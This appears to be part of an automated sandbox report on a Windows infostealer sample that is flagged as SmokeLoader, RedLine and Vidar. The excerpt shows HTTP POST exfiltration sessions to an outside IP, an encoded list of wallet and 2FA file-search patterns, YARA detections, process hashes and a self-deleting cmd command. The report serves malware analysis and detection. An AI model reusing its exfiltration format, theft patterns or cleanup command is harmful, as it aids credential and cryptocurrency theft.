                                                                      Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.44979165.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:42 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAF
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 453
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:42 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KJDGDGDHDGDBFIDHDBAFCont
                                                                      2024-05-26 08:29:42 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.44979265.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:44 UTC280OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 97541
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IDBAFHDGDGHDGCBFCFIDCont
                                                                      2024-05-26 08:29:44 UTC16355OUTData Raw: 69 69 6b 41 6c 46 4c 52 69 67 42 4b 53 6c 70 4b 42 68 51 61 4b 4b 59 78 4b 4b 57 69 6b 41 6c 46 4c 69 6b 6f 41 53 69 6c 70 4b 42 69 55 55 74 4a 51 4d 4b 53 6c 70 44 51 41 55 6c 4c 52 54 41 53 6b 4e 4c 52 51 4e 43 55 47 69 6a 46 41 78 4b 4b 57 6b 6f 41 4b 53 6c 70 4b 59 78 4b 51 30 36 6b 6f 47 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79
                                                                      Data Ascii: iikAlFLRigBKSlpKBhQaKKYxKKWikAlFLikoASilpKBiUUtJQMKSlpDQAUlLRTASkNLRQNCUGijFAxKKWkoAKSlpKYxKQ06koGJRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDy
                                                                      2024-05-26 08:29:44 UTC16355OUTData Raw: 6a 4b 6b 73 4b 38 47 33 70 65 36 39 65 71 2b 66 39 62 6e 4a 5a 72 6f 66 42 45 38 73 58 69 2b 78 45 52 2b 2b 7a 49 77 39 56 4b 6e 50 2b 50 34 55 79 62 77 50 34 6a 68 6e 38 72 2b 7a 6e 66 6e 41 64 48 55 71 66 78 7a 78 2b 4e 64 4e 34 65 30 4f 50 77 72 4f 62 6e 55 4a 59 6e 31 5a 34 7a 35 4e 74 47 64 33 6c 4b 65 72 4e 2f 4c 2f 48 74 39 62 6d 4f 59 59 61 6a 68 5a 7a 6c 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 49 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 79 61 35 2f 77 41 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 41 49 59 2b 6f 34 68 6e 47 6c 6c 6c 54 6d 36 70 4c 35 33 52 68 55 6e 4e 4c 52 58 37 57 66 6b 59 55 55 55 55 41 65 72 4d
                                                                      Data Ascii: jKksK8G3pe69eq+f9bnJZrofBE8sXi+xER++zIw9VKnP+P4UybwP4jhn8r+znfnAdHUqfxzx+NdN4e0OPwrObnUJYn1Z4z5NtGd3lKerN/L/Ht9bmOYYajhZzlJNWZnhcNWlWirW1NK6CpeTIv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyTya5/wARzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/AIY+o4hnGlllTm6pL53RhUnNLRX7WfkYUUUUAerM
                                                                      2024-05-26 08:29:44 UTC16355OUTData Raw: 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 38 41 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 43 69 69 69 67 51 55 55 55 55 44 43 69 69 69 67 41 70 4b 57 69 6b 41 6c 51 33 63 33 32 61 31 6b 6d 41 79 56 48 41 39 2b 6c 54 39 71 70 36 72 2f 79 44 5a 76 77 2f 6d 4b 35 73 62 55 6c 54 77 31 53 63 64 31 46 74 66 4a 48 70 5a 4e 51 70 34 6a 4d 73 50 51 71 71 38 5a 54 67 6d 76 4a 79 53 5a 32 4e 72 38 4e 39 55 6d 74 59 35 62 6e 58 46 74 35 6e 55 46 6f 6c 74 41 34 51 2b 6d 64
                                                                      Data Ascii: GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P8ASkPTNH+eaO1Io9AooorA+UCiiigQUUUUDCiiigApKWikAlQ3c32a1kmAyVHA9+lT9qp6r/yDZvw/mK5sbUlTw1Scd1FtfJHpZNQp4jMsPQqq8ZTgmvJySZ2Nr8N9UmtY5bnXFt5nUFoltA4Q+md
                                                                      2024-05-26 08:29:44 UTC16355OUTData Raw: 4c 2b 32 76 37 6e 34 2f 38 41 2b 72 2f 41 4e 57 50 2b 6e 76 2f 41 4a 4c 2f 41 4d 45 38 61 6f 72 31 76 55 4e 4d 73 45 30 79 37 64 62 47 31 56 6c 68 63 67 69 46 51 51 64 70 39 71 34 2f 78 4e 34 64 45 44 76 65 32 4b 66 75 6a 7a 4a 47 50 34 66 63 65 31 62 30 4d 33 68 55 6e 79 7a 6a 79 2b 64 7a 6d 78 66 44 74 57 6a 53 63 36 63 75 61 33 53 31 76 31 5a 79 6c 46 46 46 65 75 66 4f 68 52 52 52 51 41 55 59 6f 6f 6f 41 51 39 4b 4b 58 46 46 41 43 55 75 4b 4d 63 30 55 41 47 4b 4d 55 55 55 41 4a 52 53 34 6f 50 31 6f 41 53 69 6c 34 70 4d 69 6c 63 41 70 63 55 33 64 37 55 62 71 42 6a 73 55 59 70 75 37 33 70 4d 35 70 68 59 64 69 6a 6a 31 70 6c 46 41 57 48 35 48 72 53 62 68 36 55 32 69 67 4c 44 74 31 4a 75 70 4b 53 67 64 68 32 54 53 5a 70 4b 4b 41 43 69 69 69 67 59 6c 46 46
                                                                      Data Ascii: L+2v7n4/8A+r/ANWP+nv/AJL/AME8aor1vUNMsE0y7dbG1VlhcgiFQQdp9q4/xN4dEDve2KfujzJGP4fce1b0M3hUnyzjy+dzmxfDtWjSc6cua3S1v1ZylFFFeufOhRRRQAUYoooAQ9KKXFFACUuKMc0UAGKMUUUAJRS4oP1oASil4pMilcApcU3d7UbqBjsUYpu73pM5phYdijj1plFAWH5HrSbh6U2igLDt1JupKSgdh2TSZpKKACiiigYlFF
                                                                      2024-05-26 08:29:44 UTC15766OUTData Raw: 47 4b 54 76 51 65 4b 4d 66 6a 51 4d 51 30 55 47 6a 76 51 41 55 6e 42 36 38 30 55 65 31 41 78 44 78 36 55 64 2f 65 67 39 63 64 4b 42 78 51 4d 44 7a 53 64 66 65 6c 78 52 6d 67 42 43 4b 51 2f 77 43 65 61 58 6f 4d 2f 68 53 55 44 50 52 4b 4b 4b 4b 67 2b 53 4e 2f 77 66 38 41 38 68 35 66 2b 75 62 66 30 72 73 64 63 76 5a 64 50 30 53 39 75 34 43 42 4e 46 43 7a 49 54 32 4f 4f 74 63 62 34 51 2f 35 44 71 2f 39 63 32 2f 70 58 63 58 75 6e 70 71 31 6c 50 59 50 49 30 61 7a 6f 55 4c 4b 4d 6b 56 38 50 6e 6a 58 39 71 55 37 37 65 37 2b 5a 39 39 77 38 6d 38 74 6e 79 37 33 6c 2b 53 4d 48 77 70 34 6e 47 72 32 65 6d 32 55 78 4a 75 6f 52 38 7a 6b 35 33 37 51 36 6e 38 51 4e 68 4a 2f 32 71 33 4e 52 6a 76 47 38 51 51 4e 48 41 37 57 76 32 5a 78 4a 4b 43 4e 71 6e 61 2b 4d 6a 65 44 36
                                                                      Data Ascii: GKTvQeKMfjQMQ0UGjvQAUnB680Ue1AxDx6Ud/eg9cdKBxQMDzSdfelxRmgBCKQ/wCeaXoM/hSUDPRKKKKg+SN/wf8A8h5f+ubf0rsdcvZdP0S9u4CBNFCzIT2OOtcb4Q/5Dq/9c2/pXcXunpq1lPYPI0azoULKMkV8PnjX9qU77e7+Z99w8m8tny73l+SMHwp4nGr2em2UxJuoR8zk537Q6n8QNhJ/2q3NRjvG8QQNHA7Wv2ZxJKCNqna+MjeD6
                                                                      2024-05-26 08:29:45 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.44979365.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:46 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEH
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 331
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CBAKFCBFHJDHJKECAKEHCont
                                                                      2024-05-26 08:29:47 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:04:27:55
                                                                      Start date:26/05/2024
                                                                      Path:C:\Users\user\Desktop\2.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\2.exe"
                                                                      Imagebase:0x400000
                                                                      File size:240'128 bytes
                                                                      MD5 hash:4D956BA3709B6BE0CC4910690EF93F0B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1740824715.0000000002E2B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1740978999.00000000049F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1740978999.00000000049F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1740688964.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1740710634.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1740710634.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:04:28:01
                                                                      Start date:26/05/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff72b770000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:5
                                                                      Start time:04:28:20
                                                                      Start date:26/05/2024
                                                                      Path:C:\Users\user\AppData\Roaming\jssrvvh
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\jssrvvh
                                                                      Imagebase:0x400000
                                                                      File size:240'128 bytes
                                                                      MD5 hash:4D956BA3709B6BE0CC4910690EF93F0B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1969684642.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1969820013.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1969820013.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1969542787.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1969780302.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1969780302.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 39%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:04:28:27
                                                                      Start date:26/05/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      Imagebase:0x400000
                                                                      File size:325'120 bytes
                                                                      MD5 hash:EA9DD1EAE2E521666D3F06382104EC10
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2346623744.00000000005DD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 96%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:04:28:50
                                                                      Start date:26/05/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7932 -s 1512
                                                                      Imagebase:0x410000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:04:28:58
                                                                      Start date:26/05/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\D818.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\D818.exe
                                                                      Imagebase:0x400000
                                                                      File size:2'121'216 bytes
                                                                      MD5 hash:AC1CC39DC3DF2AB7197EC22259A09E17
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:04:28:59
                                                                      Start date:26/05/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      Imagebase:0x400000
                                                                      File size:881'664 bytes
                                                                      MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 4%, ReversingLabs
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:04:29:48
                                                                      Start date:26/05/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katB4C0.tmp" & rd /s /q "C:\ProgramData\FIEGCBKEGCFC" & exit
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:04:29:48
                                                                      Start date:26/05/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:04:29:48
                                                                      Start date:26/05/2024
                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:timeout /t 10
                                                                      Imagebase:0x330000
                                                                      File size:25'088 bytes
                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:16
                                                                      Start time:04:30:01
                                                                      Start date:26/05/2024
                                                                      Path:C:\Users\user\AppData\Roaming\jssrvvh
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\jssrvvh
                                                                      Imagebase:0x400000
                                                                      File size:240'128 bytes
                                                                      MD5 hash:4D956BA3709B6BE0CC4910690EF93F0B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.3994207435.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.3995067757.000000000302E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.3994385384.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.3994385384.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:7.7%
                                                                        Dynamic/Decrypted Code Coverage:41.7%
                                                                        Signature Coverage:41.7%
                                                                        Total number of Nodes:115
